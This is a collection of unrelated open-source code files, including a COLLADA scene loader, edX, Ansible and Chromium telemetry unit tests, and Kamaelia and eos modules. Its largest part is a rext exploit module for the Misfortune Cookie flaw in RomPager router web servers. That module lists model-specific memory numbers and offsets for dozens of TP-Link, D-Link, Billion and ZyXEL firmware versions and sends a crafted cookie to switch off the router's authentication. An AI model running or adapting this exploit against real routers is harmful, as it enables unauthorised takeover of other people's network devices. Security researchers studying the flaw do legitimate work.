self.xmlnode = E.extra()
def objects(self, tipo, matrix=None):
if tipo == 'extra':
for e in self.xmlnode.findall(tag(tipo)):
yield e
@staticmethod
def load( collada, node ):
return ExtraNode(node)
def save(self):
pass
def loadNode( collada, node, localscope ):
"""Generic scene node loading from a xml `node` and a `collada` object.
Knowing the supported nodes, create the appropiate class for the given node
and return it.
"""
if node.tag == tag('node'): return Node.load(collada, node, localscope)
elif node.tag == tag('translate'): return TranslateTransform.load(collada, node)
elif node.tag == tag('rotate'): return RotateTransform.load(collada, node)
elif node.tag == tag('scale'): return ScaleTransform.load(collada, node)
elif node.tag == tag('matrix'): return MatrixTransform.load(collada, node)
elif node.tag == tag('lookat'): return LookAtTransform.load(collada, node)
elif node.tag == tag('instance_geometry'): return GeometryNode.load(collada, node)
elif node.tag == tag('instance_camera'): return CameraNode.load(collada, node)
elif node.tag == tag('instance_light'): return LightNode.load(collada, node)
elif node.tag == tag('instance_controller'): return ControllerNode.load(collada, node)
elif node.tag == tag('instance_node'): return NodeNode.load(collada, node, localscope)
elif node.tag == tag('extra'):
return ExtraNode.load(collada, node)
elif node.tag == tag('asset'):
return None
else: raise DaeUnsupportedError('Unknown scene node %s' % str(node.tag))
class Scene(DaeObject):
"""The root object for a scene, as defined in a collada <scene> tag"""
def __init__(self, id, nodes, xmlnode=None, collada=None):
"""Create a scene
:param str id:
A unique string identifier for the scene
:param list nodes:
A list of type :class:`collada.scene.Node` representing the nodes in the scene
:param xmlnode:
When loaded, the xmlnode it comes from
:param collada:
The collada instance this is part of
"""
self.id = id
"""The unique string identifier for the scene"""
self.nodes = nodes
"""A list of type :class:`collada.scene.Node` representing the nodes in the scene"""
self.collada = collada
"""The collada instance this is part of"""
if xmlnode != None:
self.xmlnode = xmlnode
"""ElementTree representation of the scene node."""
else:
self.xmlnode = E.visual_scene(id=self.id)
for node in nodes:
self.xmlnode.append( node.xmlnode )
def objects(self, tipo):
"""Iterate through all objects in the scene that match `tipo`.
The objects will be bound and transformed via the scene transformations.
:param str tipo:
A string for the desired object type. This can be one of 'geometry',
'camera', 'light', or 'controller'.
:rtype: generator that yields the type specified
"""
matrix = None
for node in self.nodes:
for obj in node.objects(tipo, matrix): yield obj
@staticmethod
def load( collada, node ):
id = node.get('id')
nodes = []
tried_loading = []
succeeded = False
localscope = {}
for nodenode in node.findall(tag('node')):
try:
N = loadNode(collada, nodenode, localscope)
except DaeInstanceNotLoadedError as ex:
tried_loading.append((nodenode, ex))
except DaeError as ex:
collada.handleError(ex)
else:
if N is not None:
nodes.append( N )
if N.id and N.id not in localscope:
localscope[N.id] = N
succeeded = True
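# Nodes whose <instance_node> targets were not loaded yet are retried
# below; each pass loads whatever became resolvable and stops once no
# further progress is made.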
while len(tried_loading) > 0 and succeeded:
succeeded = False
next_tried = []
for nodenode, ex in tried_loading:
try:
N = loadNode(collada, nodenode, localscope)
except DaeInstanceNotLoadedError as ex:
next_tried.append((nodenode, ex))
except DaeError as ex:
collada.handleError(ex)
else:
if N is not None:
nodes.append( N )
succeeded = True
tried_loading = next_tried
if len(tried_loading) > 0:
for nodenode, ex in tried_loading:
raise DaeBrokenRefError(ex.msg)
return Scene(id, nodes, xmlnode=node, collada=collada)
def save(self):
"""Saves the scene back to :attr:`xmlnode`"""
self.xmlnode.set('id', self.id)
for node in self.nodes:
node.save()
if node.xmlnode not in self.xmlnode:
self.xmlnode.append(node.xmlnode)
xmlnodes = [n.xmlnode for n in self.nodes]
for node in self.xmlnode:
if node not in xmlnodes:
self.xmlnode.remove(node)
def __str__(self):
return '<Scene id=%s nodes=%d>' % (self.id, len(self.nodes))
def __repr__(self):
return str(self)
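# A minimal usage sketch of the API above (illustrative only; 'model.dae' is a
# hypothetical file and the package is assumed importable as `collada`):
#
#   import collada
#   mesh = collada.Collada('model.dae')
#   for geom in mesh.scene.objects('geometry'):
#       # each yielded object is a bound geometry with the scene transforms applied
#       for prim in geom.primitives():
#           print(type(prim))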
|
gpl-3.0
|
romain-li/edx-platform
|
lms/djangoapps/courseware/tests/test_video_xml.py
|
17
|
3114
|
# -*- coding: utf-8 -*-
# pylint: disable=protected-access
"""Test for Video Xmodule functional logic.
These test data read from xml, not from mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py.
You can search for usages of this in the cms and lms tests for examples.
Use it so that the test run points the modulestore setting at mongo,
flushes the contentstore before and after each test, loads the
templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined in
common/lib/xmodule/xmodule/modulestore/tests/factories.py to create the
course, section, subsection, unit, etc.
"""
from nose.plugins.attrib import attr
from xmodule.video_module import VideoDescriptor
from xmodule.tests import LogicTest
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
youtube="0.75:jNCf2gIqpeE,1.0:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
<transcript language="uk" src="ukrainian_translation.srt" />
</video>
"""
@attr(shard=1)
class VideoModuleLogicTest(LogicTest):
"""Tests for logic of Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
|
agpl-3.0
|
j91321/rext
|
modules/exploits/allegrosoft/misfortune_auth_bypass.py
|
1
|
22767
|
# Name:Misfortune Cookie vulnerability authentication bypass
# File:misfortune_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 22.9.2016
# Description: PoC based on 31C3 presentation,
# exploit based on Marcin Bury and Milad Doorbash routersploit module.
import core.Exploit
import interface.utils
from core.io import query_yes_no
from interface.messages import print_failed, print_success, print_warning, print_error, print_info, print_help
import requests
import requests.exceptions
import re
class Exploit(core.Exploit.RextExploit):
"""
Name:Misfortune Cookie vulnerability authentication bypass
File:misfortune_auth_bypass.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 4.2.2014
Description: PoC based on 31C3 presentation, exploit based on Marcin Bury and Milad Doorbash routersploit module.
Options:
Name Description
host Target host address
port Target port
model Target model
"""
devices = None
number = None
offset = None
def __init__(self):
# This part is directly taken from routersploit module
self.devices = [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693,
'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545,
'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218,
'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366,
'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453,
'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690,
'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270,
'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378,
'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218,
'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",
'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13},
# 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20},
# 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21},
# 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17},
# 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1},
# 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5},
# 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25},
# 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21},
# 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9},
# 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20},
# 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17},
# 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5},
# 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1},
# 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17},
# 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5},
# 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17},
# 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37},
# 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21},
# 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21},
# 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25},
# 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25},
# 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1},
# 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24},
# 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21},
# 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9},
# 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13},
# 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25},
# 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21},
# 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1},
# 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25},
# 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13},
# 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21},
# 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0},
# 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25},
# 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21},
# 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25},
# 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13},
# 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21},
# 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21},
# 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13},
# 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25},
# 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37},
# 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29},
# 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0},
# 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36},
# 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071
]
core.Exploit.RextExploit.__init__(self)
def do_list(self, e):
print_info("ID\tManufacturer\tModel\tFirmware")
for counter, device in enumerate(self.devices):
print_info("%d %s" % (counter, device['name']))
def do_set(self, e):
args = e.split(' ')
try:
if args[0] == "host":
if interface.utils.validate_ipv4(args[1]):
self.host = args[1]
else:
print_error("Please provide valid IPv4 address")
elif args[0] == "port":
if str.isdigit(args[1]):
self.port = args[1]
else:
print_error("Port value must be integer")
elif args[0] == 'device':
if not str.isdigit(args[1]):
print_error("Invalid device ID")
elif int(args[1]) < 0 or int(args[1]) >= len(self.devices):
print_error("Invalid device ID")
else:
index = int(args[1])
print_info("Device: %s" % self.devices[index]['name'])
self.number = self.devices[index]['number']
print_info("Setting address to: %d" % self.number)
self.offset = self.devices[index]['offset']
print_info("Setting offset: %d" % self.offset)
except IndexError:
print_error("please specify value for variable")
def check(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_warning("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_success("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("Device is vulnerable to misfortune cookie")
return True
else:
print_failed("Test didn't pass.")
print_warning("Device MAY still be vulnerable")
return False
else:
print_failed("RomPager not detected, device is running: %s " % server)
return False
else:
print_failed("Not running RomPager")
return False
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def auth_bypass(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'}
target = 'http://' + self.host + ":" + self.port
try:
response = requests.get(target, headers=headers, timeout=60)
if response is not None and response.status_code <= 302:
print_success("Exploit sent, please check http://%s:%s authentication should be disabled"
% (self.host, self.port))
else:
print_error("Exploit failed")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
# First check with the same code as in misfortune cookie scanner
is_vulnerable = self.check()
if self.offset is None:
print_error("Please set device model by running set device id")
return
if is_vulnerable:
self.auth_bypass()
else:
if query_yes_no("Check indicates device is not vulnerable, would you like to try the exploit anyway?",
default="no"):
self.auth_bypass()
def help_list(self):
print_help("List all available devices")
Exploit()
|
gpl-3.0
|
willthames/ansible
|
test/units/modules/network/nxos/test_nxos_vlan.py
|
47
|
3851
|
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.nxos import nxos_vlan
from .nxos_module import TestNxosModule, load_fixture, set_module_args
class TestNxosVlanModule(TestNxosModule):
module = nxos_vlan
def setUp(self):
self.mock_run_commands = patch('ansible.modules.network.nxos.nxos_vlan.run_commands')
self.run_commands = self.mock_run_commands.start()
self.mock_load_config = patch('ansible.modules.network.nxos.nxos_vlan.load_config')
self.load_config = self.mock_load_config.start()
self.mock_get_config = patch('ansible.modules.network.nxos.nxos_vlan.get_config')
self.get_config = self.mock_get_config.start()
def tearDown(self):
self.mock_run_commands.stop()
self.mock_load_config.stop()
self.mock_get_config.stop()
def load_fixtures(self, commands=None, device=''):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item)
command = obj['command']
except ValueError:
command = item
filename = '%s.txt' % str(command).split(' | ')[0].replace(' ', '_')
output.append(load_fixture('nxos_vlan', filename))
return output
self.run_commands.side_effect = load_from_file
self.load_config.return_value = None
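# For example, a queued command of 'show vlan brief | json' maps to the fixture
# file 'show_vlan_brief.txt' in the nxos_vlan fixture directory: everything
# after ' | ' is dropped and spaces become underscores.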
def test_nxos_vlan_range(self):
set_module_args(dict(vlan_range='6-10'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 6', 'vlan 7', 'vlan 8', 'vlan 9', 'vlan 10'])
def test_nxos_vlan_range_absent(self):
set_module_args(dict(vlan_range='1-5', state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['no vlan 1'])
def test_nxos_vlan_id(self):
set_module_args(dict(vlan_id='15', state='present'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 15', 'exit'])
def test_nxos_vlan_id_absent(self):
set_module_args(dict(vlan_id='1', state='absent'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['no vlan 1'])
def test_nxos_vlan_named_vlan(self):
set_module_args(dict(vlan_id='15', name='WEB'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 15', 'name WEB', 'exit'])
def test_nxos_vlan_shut_down(self):
set_module_args(dict(vlan_id='1', admin_state='down'))
result = self.execute_module(changed=True)
self.assertEqual(result['commands'], ['vlan 1', 'shutdown', 'exit'])
def test_nxos_vlan_no_change(self):
set_module_args(dict(vlan_id='1', name='default', vlan_state='active', admin_state='up'))
result = self.execute_module(changed=False)
self.assertEqual(result['commands'], [])
|
gpl-3.0
|
sahiljain/catapult
|
telemetry/telemetry/timeline/tab_id_importer_unittest.py
|
6
|
2948
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.timeline import model as timeline_model
from telemetry.timeline import tab_id_importer
from tracing.trace_data import trace_data as trace_data_module
class TabIdImporterUnitTest(unittest.TestCase):
def testImportOverflowedTrace(self):
builder = trace_data_module.TraceDataBuilder()
builder.AddTraceFor(trace_data_module.CHROME_TRACE_PART, {'traceEvents': [
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 7, 'cat': 'foo',
'tid': 1, 'ph': 'B'},
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 8, 'cat': 'foo',
'tid': 1, 'ph': 'E'},
{'name': 'b', 'args': {}, 'pid': 2, 'ts': 9, 'cat': 'foo',
'tid': 2, 'ph': 'B'},
{'name': 'b', 'args': {}, 'pid': 2, 'ts': 10, 'cat': 'foo',
'tid': 2, 'ph': 'E'},
{'name': 'trace_buffer_overflowed',
'args': {'overflowed_at_ts': 12},
'pid': 2, 'ts': 0, 'tid': 2, 'ph': 'M'}
]})
builder.AddTraceFor(
trace_data_module.TAB_ID_PART, ['tab-id-1', 'tab-id-2'])
with self.assertRaises(tab_id_importer.TraceBufferOverflowException) \
as context:
timeline_model.TimelineModel(builder.AsData())
self.assertTrue(
'Trace buffer of process with pid=2 overflowed at timestamp 12' in
context.exception.message)
def testTraceEventsWithTabIdsMarkers(self):
builder = trace_data_module.TraceDataBuilder()
builder.AddTraceFor(trace_data_module.CHROME_TRACE_PART, {'traceEvents': [
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 20, 'tts': 10, 'cat': 'foo',
'tid': 1, 'ph': 'B'},
# tab-id-1
{'name': 'tab-id-1', 'args': {}, 'pid': 1, 'ts': 25, 'cat': 'foo',
'tid': 1,
'ph': 'S', 'id': 72},
{'name': 'a', 'args': {}, 'pid': 1, 'ts': 30, 'tts': 20, 'cat': 'foo',
'tid': 1, 'ph': 'E'},
{'name': 'tab-id-1', 'args': {}, 'pid': 1, 'ts': 35, 'cat': 'foo',
'tid': 1,
'ph': 'F', 'id': 72},
# tab-id-2
{'name': 'tab-id-2', 'args': {}, 'pid': 1, 'ts': 25, 'cat': 'foo',
'tid': 2,
'ph': 'S', 'id': 72},
{'name': 'tab-id-2', 'args': {}, 'pid': 1, 'ts': 26, 'cat': 'foo',
'tid': 2,
'ph': 'F', 'id': 72},
]})
builder.AddTraceFor(
trace_data_module.TAB_ID_PART, ['tab-id-1', 'tab-id-2'])
m = timeline_model.TimelineModel(builder.AsData())
processes = m.GetAllProcesses()
self.assertEqual(1, len(processes))
self.assertIs(processes[0], m.GetRendererProcessFromTabId('tab-id-1'))
self.assertIs(processes[0], m.GetRendererProcessFromTabId('tab-id-2'))
p = processes[0]
self.assertEqual(2, len(p.threads))
self.assertIs(p.threads[1], m.GetRendererThreadFromTabId('tab-id-1'))
self.assertIs(p.threads[2], m.GetRendererThreadFromTabId('tab-id-2'))
|
bsd-3-clause
|
sparkslabs/kamaelia
|
Sketches/RJL/Util/PureTransformer.py
|
3
|
2018
|
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Axon.Component import component
from Axon.Ipc import producerFinished, shutdown
"""\
=================
Pure Transformer component
=================
This component applies a function, specified at creation time, to each message received on its inbox and sends the result to its outbox; if the function returns None the message is dropped, so it can also act as a filter.
Example Usage
-------------
To read in lines of text, convert to upper case and then write to the console.
pipeline(
ConsoleReader(),
PureTransformer(lambda x : x.upper()),
ConsoleEchoer()
).run()
"""
class PureTransformer(component):
def __init__(self, function=None):
super(PureTransformer, self).__init__()
if function:
self.processMessage = function
def processMessage(self, msg):
pass
def main(self):
while 1:
yield 1
while self.dataReady("inbox"):
returnval = self.processMessage(self.recv("inbox"))
if returnval is not None:
self.send(returnval, "outbox")
while self.dataReady("control"):
msg = self.recv("control")
if isinstance(msg, producerFinished) or isinstance(msg, shutdown):
self.send(producerFinished(self), "signal")
return
self.pause()
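# Example sketch: because main() above drops None results before sending, a
# PureTransformer can also filter, e.g.
#   PureTransformer(lambda x: x if "keep" in x else None)
# forwards only messages containing "keep".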
|
apache-2.0
|
Ebag333/Pyfa
|
eos/db/gamedata/effect.py
|
1
|
2320
|
# ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from sqlalchemy import Column, String, Integer, Boolean, Table, ForeignKey
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import mapper, synonym, relation, deferred
from eos.db import gamedata_meta
from eos.types import Effect, EffectInfo
typeeffects_table = Table("dgmtypeeffects", gamedata_meta,
